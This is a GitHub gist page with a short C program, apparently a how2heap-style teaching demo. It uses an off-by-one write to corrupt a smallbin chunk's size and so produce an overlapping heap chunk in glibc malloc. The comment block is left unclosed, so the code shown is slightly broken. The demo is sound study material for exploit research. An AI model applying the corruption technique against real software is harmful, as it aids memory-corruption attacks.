Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
/* Similar to overlapping_chunks.c (from how2heap) with a small change.
* Instead of overwriting size of unsorted chunk, overwrite size of small chunk.
* Now you have to malloc the original size to retrieve this chunk
* Freeing again will now create an overlapped chunk in the unsorted bin which
* can later be retrieved using malloc(corrupt_size);
#include <stdio.h>
#include <stdlib.h>
int main() {
char *p1 = malloc(0x108);
char *p2 = malloc(0x108);
char *p3 = malloc(0x0); // Preventing merge with top chunk
free(p2); // Unsorted bin
char *p4 = malloc(0x200); // p2 goes to smallbin
// Off by one vuln
p1[0x108] = 0x51;
// p2's size is now 0x150, but still in 0x110 smallbin
// Hence, it will be returned in malloc(0x108)
// NOTE: A chunk of size 0x150 is returned for a requested size
// of 0x108
char *p5 = malloc(0x108);
// Setting some valid size of the next chunk
p4[0x10 + 0x8] = 0x21;
// Setting next chunk to be in use
p4[0x10 + 0x20 + 0x8] = 0x1;
free(p5); // p2 freed again
// Now we have a free chunk of size 0x150 in unsorted bin
// which is overlapping with p3!!
char *p6 = malloc(0x140);
fprintf(stderr, "Overlap p6: %p - %p, p3: %p\n", p6, p6 + 0x140, p3);
return 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.